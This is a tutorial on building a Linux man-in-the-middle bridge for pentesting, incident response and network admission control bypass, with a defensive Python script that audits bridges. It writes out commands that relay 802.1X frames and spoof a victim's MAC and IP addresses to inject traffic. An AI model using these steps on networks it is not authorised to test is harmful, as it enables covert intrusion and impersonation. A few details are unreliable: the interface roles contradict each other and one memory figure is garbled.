Creating a Man-In-the-Middle Bridge (MIBR)

A Man-In-the-Middle Bridge is a device you insert between a computer and a network switch that transparently forwards traffic whilst allowing full control over the traffic. It has multiple uses including Incident Response, network inspection and injection, pentesting and NAC bypass.

Incident Response: capturing traffic between an infected computer and a command and control computer.
Network Inspection / Injection: allows traffic to be captured and injected.
Penetration Testing: a stealthy way of accessing the network, and also a way of providing assurance by connecting the pentest laptop to the MIBR inject port and capturing all traffic on the MIBR. Any discussion about what did or did not take place can then be easily verified. It also has the advantage of not requiring any additional switch ports to be configured, as you use an existing one.
NAC Bypass: many enterprises implement NAC (Network Admission Control), which prevents unauthorised devices from being connected. Using the MIBR, the victim computer provides the authentication, which is forwarded to the switch port.

Hardware Requirements


The hardware requirements for the MIBR are any device with at least two network adapters; three are required if you want to connect another device to the bridge. I've tried various combinations and each has its own pros and cons; my workhorse for reliability is the PCengines APU2, but the Raspberry PI 3-B is more affordable and offers interfacing not found on the APU2.

Type                                                   | NICs | Pros                                                         | Cons                                                            | Memory (MB)   | Price (approx) | OS
Laptop + USB Network Adapter                           | 2    | Relatively cheap and easy                                    | Size, throughput limited by USB                                 | 2048-32768 GB | 40 Eur         | Any
Soekris 4801                                           | 3    | Small Form Factor, possible wireless extension               | Throughput limited by CPU, low memory                           | 256           | 120 Eur        | voyage
Soekris 6501                                           | 4    | Small Form Factor, possible wireless extension               | Throughput limited by USB speeds                                | 512-2048      | 180 Eur        | Any
PCengines APU2                                         | 3    | Small Form Factor, built-in GSM, possible wireless extension | -                                                               | 4096          | 182 Eur        | Any
Raspberry PI 3-B + USB Network Adapter                 | 1    | Small Form Factor, Cheap                                     | Speed limited by USB                                            | 1024          | 45 Eur         | Any
Raspberry PI Zero + 2x USB Network Adapter and USB Hub | 1    | Small Form Factor, Cheap                                     | Speed limited by USB, messy with all the connectors, prefer 3-B | 512           | 5 Eur          | Any

Irrespective of the platform, the scripts assume that the interfaces are used as follows:

eth0    Connected to switch
eth1    Connected to victim device
eth2    Connect your laptop here (use IP 192.168.0.2/24)

The names of the interfaces and many other parameters can be adjusted in the script or via the config files it creates automatically.

Software Requirements


The MIBR uses the native bridge capabilities of the Linux kernel; any linux distro should work as long as it fits on your hardware. The script makes use of the following tools:

brctl       Bridge tools (bridge-utils; newer distributions provide the same functionality through iproute2's ip and bridge commands)
iptables    Provides IP firewalling
ebtables    Provides L2 (bridge) firewalling

Which OS to use and how you configure it is outside the scope of this document; any linux distro should work.

Usage

The enclosed bash script simplifies the use of the MIBR by configuring the network interfaces and setting bridge mode. It is styled as a SYSV init script and takes the following command line parameters:

bridge.sh                  Shows all options
bridge.sh start            Configure all interfaces and set bridge mode
bridge.sh stop             Stop the bridge
bridge.sh restart          Perform a stop/start
bridge.sh status           Show the status of the bridge
bridge.sh setspoof         Add an inject interface and configure IP and NAT using CIFS info from the victim captured on TCP/445
bridge.sh setspoofdhcp     Add an inject interface and configure IP and NAT using DHCP info from the victim (disconnect the victim link to force a new DHCP exchange)

Background

The linux kernel supports native bridging; setting up the bridge manually would involve the following sequence (the bridge is called mibr throughout):
	ifconfig eth0 0.0.0.0                       # Remove any IP address
	ifconfig eth0 down                          # Take interface down
	ifconfig eth0 hw ether de:ad:be:ef:d4:ad    # Force MAC address (only possible while the interface is down)
	ifconfig eth0 up                            # Bridge ports must be up before the bridge will forward

	ifconfig eth1 0.0.0.0
	ifconfig eth1 down
	ifconfig eth1 hw ether de:ad:be:ef:d4:ae
	ifconfig eth1 up

	ifconfig eth2 0.0.0.0
	ifconfig eth2 down
	ifconfig eth2 hw ether de:ad:be:ef:d4:af
	ifconfig eth2 192.168.0.1 netmask 255.255.255.0   # Assigning the address also brings eth2 back up

	ifconfig mibr down                          # A bridge can only be deleted while it is down
	brctl delbr mibr                            # Delete any existing bridge (errors if there was none; harmless)
	brctl addbr mibr                            # Create a new bridge interface
	brctl addif mibr eth0                       # Add eth0 (connected to victim computer)
	brctl addif mibr eth1                       # Add eth1 (connected to switch)
	brctl stp mibr off                          # Turn off Spanning Tree on the bridge

	# Set bridge to pass all L2 traffic (such as 802.1x); this makes it non 802.1D compliant.
	# The value used here depends on the kernel version: 8 works on most, patched versions support 49144.
	# Bit N of the mask forwards frames addressed to 01:80:c2:00:00:0N, so 8 (bit 3) forwards 802.1X PAE frames.
	echo 8     > /sys/class/net/mibr/bridge/group_fwd_mask
	echo 49144 > /sys/class/net/mibr/bridge/group_fwd_mask   # If the kernel rejects this value the write fails and 8 remains

	# Ignore IPv6 Router advertisements on the bridge
	echo 0 > /proc/sys/net/ipv6/conf/mibr/accept_ra

	#arptables -A OUTPUT -o eth1 -j DROP        # Make sure that ARP traffic is dropped from the attacker
	ifconfig mibr up                            # Bring up bridge interface (takes about 30-60 secs for the interface to settle)

With this configuration the bridge is now transparently configured to pass L2 (and above) traffic between the switch and the victim.
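The two group_fwd_mask writes are the part of this setup that matters most to anyone inspecting such a device, because they are what let 802.1X authentication frames cross the bridge. As an added example (not part of the MIBR scripts), the following Python decodes a mask value into the reserved group addresses it forwards and audits every bridge on the local host the same way, which is the check an incident responder would run on a suspect Linux box. The bit-to-address mapping is the kernel's documented sysfs ABI (bit N forwards 01:80:c2:00:00:0N); the address names come from IEEE 802.1D/802.1X; the function names are my own.

```python
"""Decode and audit the Linux bridge group_fwd_mask setting (added example)."""
from pathlib import Path

# Bit N of group_fwd_mask lets the bridge forward link-local frames sent to
# 01:80:c2:00:00:0N; a standard 802.1D bridge consumes these instead.
# Names for the well-known entries in that reserved range (IEEE 802.1D/802.1X).
RESERVED_NAMES = {
    0x0: "STP/RSTP BPDU",
    0x1: "MAC pause (802.3x)",
    0x2: "slow protocols (LACP/OAM)",
    0x3: "802.1X PAE (EAPOL)",
    0xE: "LLDP",
}

# The kernel rejects masks that set bits 0-2 (BR_GROUPFWD_RESTRICTED), which is
# why a usable mask never sets them: 49144 (0xBFF8) leaves bits 0-2 and 14 (LLDP) clear.
KERNEL_RESTRICTED = 0x0007
EAPOL_BIT = 1 << 3


def decode_group_fwd_mask(mask: int) -> list:
    """Return the reserved group addresses a bridge with this mask forwards."""
    return ["01:80:c2:00:00:%02x" % bit for bit in range(16) if mask & (1 << bit)]


def describe(mask: int) -> list:
    """Human-readable form of decode_group_fwd_mask, with the protocol name where known."""
    out = []
    for bit in range(16):
        if mask & (1 << bit):
            name = RESERVED_NAMES.get(bit, "reserved")
            out.append("01:80:c2:00:00:%02x (%s)" % (bit, name))
    return out


def assess_mask(mask: int) -> dict:
    """Summarise a mask value the way an incident responder would read it."""
    return {
        "mask": mask,
        "forwarded": decode_group_fwd_mask(mask),
        "forwards_eapol": bool(mask & EAPOL_BIT),   # relays 802.1X across the bridge
        "non_802_1d": mask != 0,                     # any bit set departs from 802.1D
        "kernel_would_reject": bool(mask & KERNEL_RESTRICTED),
    }


def audit_bridges(sysfs_root: str = "/sys/class/net") -> list:
    """Assess every bridge device on the local host.

    Returns [] when there is no bridge or no sysfs (e.g. on non-Linux hosts),
    so it is safe to call anywhere.
    """
    findings = []
    root = Path(sysfs_root)
    if not root.is_dir():
        return findings
    for dev in sorted(root.iterdir()):
        mask_file = dev / "bridge" / "group_fwd_mask"
        if not mask_file.is_file():
            continue
        try:
            mask = int(mask_file.read_text().strip(), 0)  # sysfs prints e.g. "0x8"
        except (OSError, ValueError):
            continue
        findings.append({"bridge": dev.name, **assess_mask(mask)})
    return findings


if __name__ == "__main__":
    # The two values written in the manual setup above.
    for value in (8, 49144):
        a = assess_mask(value)
        print("%d (%#x): relays 802.1X=%s; forwards %s"
              % (value, value, a["forwards_eapol"], ", ".join(describe(value))))
    for f in audit_bridges():
        print("local bridge %s: group_fwd_mask=%#x relays 802.1X=%s"
              % (f["bridge"], f["mask"], f["forwards_eapol"]))
```

Run it as root or not, it only reads sysfs; a bridge whose mask has bit 3 set is relaying EAPOL, which is exactly the non-802.1D behaviour the manual sequence above switches on and a useful thing to confirm when examining an unknown device found inline on a wall port.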

The next step is to configure the bridge to allow traffic injection by setting up L2 translation (ebtables) and NAT (iptables) for the attacker traffic.

The prerequisite for this is to determine the victim's IP and MAC address and to find an unused IP address on the victim network; these can easily be found by using tcpdump/tshark on the victim interface (eth0). The logic for this is encapsulated in the setspoof and setspoofdhcp commands supported by bridge.sh:

	SWINT=eth1                                  # Switch side Interface
	SWMAC=de:ad:be:ef:d4:ae                     # Switch side MAC address (as forced on eth1 above)

	COMPMAC=xx:xx:xx:xx:xx:xx                   # Victim MAC address
	COMIP=yyy.yyy.yyy.yyy                       # Victim IP address

	BRINT=mibr                                  # Bridge Interface

	BRIP4=yyy.yyy.yyy.yyy-2                     # An unused IP address on the victim network
	RANGE4=60000-61000                          # Range of ports to use

	# L2 NAT: frames leaving towards the switch carry the victim's MAC as source
	ebtables -t nat -A POSTROUTING -s ${SWMAC} -o ${SWINT} -j snat --to-src ${COMPMAC}

	# IPv4 NAT: injected TCP traffic is SNATed to the victim's IP, source ports taken from RANGE4
	iptables -t nat -A POSTROUTING -s ${BRIP4} -o ${BRINT} -p tcp -j SNAT --to ${COMIP}:${RANGE4}

	# IPv6 NAT (remove if no IPv6)
	COMIP6=                                     # Victim IPv6 address
	BRIP6=                                      # An unused IPv6 address on the victim network
	RANGE6=58000-59999                          # Range of ports to use

	# -p tcp is required whenever --to-source carries a port range, as in the IPv4 rule
	ip6tables -t nat -A POSTROUTING -s ${BRIP6} -o ${BRINT} -p tcp -j SNAT --to-source [${COMIP6}]:${RANGE6}


For further reading see this excellent paper which contains many links to similar work in this area.